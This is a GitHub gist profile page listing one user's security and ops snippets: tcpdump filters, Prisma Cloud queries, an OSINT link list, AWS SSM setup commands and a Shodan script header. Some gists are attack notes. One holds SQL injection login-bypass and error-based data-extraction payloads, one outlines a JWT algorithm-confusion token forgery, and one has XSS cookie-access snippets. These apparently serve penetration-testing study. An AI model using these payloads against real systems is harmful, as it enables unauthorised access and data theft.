Skip to content

Instantly share code, notes, and snippets.

View dustinbutterworth's full-sized avatar
:octocat:

Dustin Butterworth dustinbutterworth

:octocat:
View GitHub Profile
@dustinbutterworth
dustinbutterworth / keybase.md
Created September 26, 2019 00:26
Keybase gist

Keybase proof

I hereby claim:

  • I am dustinbutterworth on github.
  • I am dbutterworth (https://keybase.io/dbutterworth) on keybase.
  • I have a public key ASDCBDTBXEIX_HgXk-xsI8G_3L-KQg_US9lhdLCn44qDrgo

To claim this, I am signing this object:

@dustinbutterworth
dustinbutterworth / butters-tcpdump
Created September 26, 2019 00:47
Helpful tcpdump commands
# TCP Dump for HTTP GET including request/response headers and body:
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
# TCP Dump for HTTP POST including request/response headers and body:
tcpdump -X -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
@dustinbutterworth
dustinbutterworth / rql-snippets.txt
Created November 22, 2019 18:24
Useful RQL Queries for Prisma Cloud
# If you want to tag something so that Prisma Cloud doesn't alert on it if the tag contains a certain string value
# And you want to continue alerting if something does not have this specific tag at all, tag this onto your already existing query:
and ((tags[?(@.key=='PrismaCloudMonitored' && @.value!='no')] size > 0) or (tags[*].key does not contain PrismaCloudMonitored))
# If you don't want prisma cloud to alert on SQL Express, since you can't encrypt SQL express:
json.rule="(engine does not contain 'sqlserver-ex') and (dbiResourceId does not equal null and storageEncrypted is false)"
@dustinbutterworth
dustinbutterworth / sqli-union-login.txt
Last active January 31, 2022 11:30
SQLi UNION For Login Bypass
username=' UNION SELECT "butters" as password FROM admins WHERE '1' = '1
password=butters
username=foo' OR (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
shows table name admin
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
gives id row
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
gives username row
@dustinbutterworth
dustinbutterworth / shodan_api_query.py
Created July 6, 2020 14:23 — forked from LuD1161/shodan_api_query.py
Query Shodan API : Plain and Simple
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
@dustinbutterworth
dustinbutterworth / JavascriptTomfoolery.js
Last active July 21, 2020 01:47
Javascript Tomfoolery
// Show hostname
window.location.hostname
// show cookie
document.cookie
// background color
document.body.style.backgroundColor = "red"
// IP and Port Scan with javascript - XSS Playground
@dustinbutterworth
dustinbutterworth / JWTTomfoolery.txt
Last active July 21, 2020 19:26
JWTTomfoolery.txt
# convert public key to hex so openssl will use it
cat $FILE | xxd -p | tr -d "\\n"
# openssl to sign as a valid HS256
echo -n "$JWT" | openssl dgst -sha256 -mac HMAC -macopt hexkey:$HEX_OF_PUBLIC_KEY
# decode hex to binary data then reencode it in base64
#!/usr/bin/env python3
import base64, binascii
@dustinbutterworth
dustinbutterworth / centosCurl.sh
Created July 27, 2020 15:35
Curl Search for latest package on Centos Repo
curl -s http://mirror.centos.org/centos/7/os/x86_64/Packages/ | grep ipa-client | cut -d '"' -f 12
@dustinbutterworth
dustinbutterworth / OSINTResources.txt
Last active January 30, 2024 06:16
OSINT Resources
Credit to @fuxksniper (https://twitter.com/fuxksniper/status/1290710096524144640):
http://grep.app
http://hunter.io
https://cxsecurity.com
https://exploit.in
https://xposedornot.com/phpvatch/
https://gcc.godbolt.org
https://2018.zeronights.ru/en/materials/
https://openpentest.com/find-subdomains
@dustinbutterworth
dustinbutterworth / AwsSsmSessionManagerTomfoolery.sh
Created August 6, 2020 19:15
AWS SSM Session Manager Tomfoolery
#!/usr/bin/env bash
instance_id="i-***************"
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
curl "https://s3.amazonaws.com/session-manager-downloads/plugin/latest/linux_64bit/session-manager-plugin.rpm" -o "session-manager-plugin.rpm"
sudo yum install session-manager-plugin.rpm -y
/usr/local/bin/aws ssm start-session --target $instance_id
#Cleanup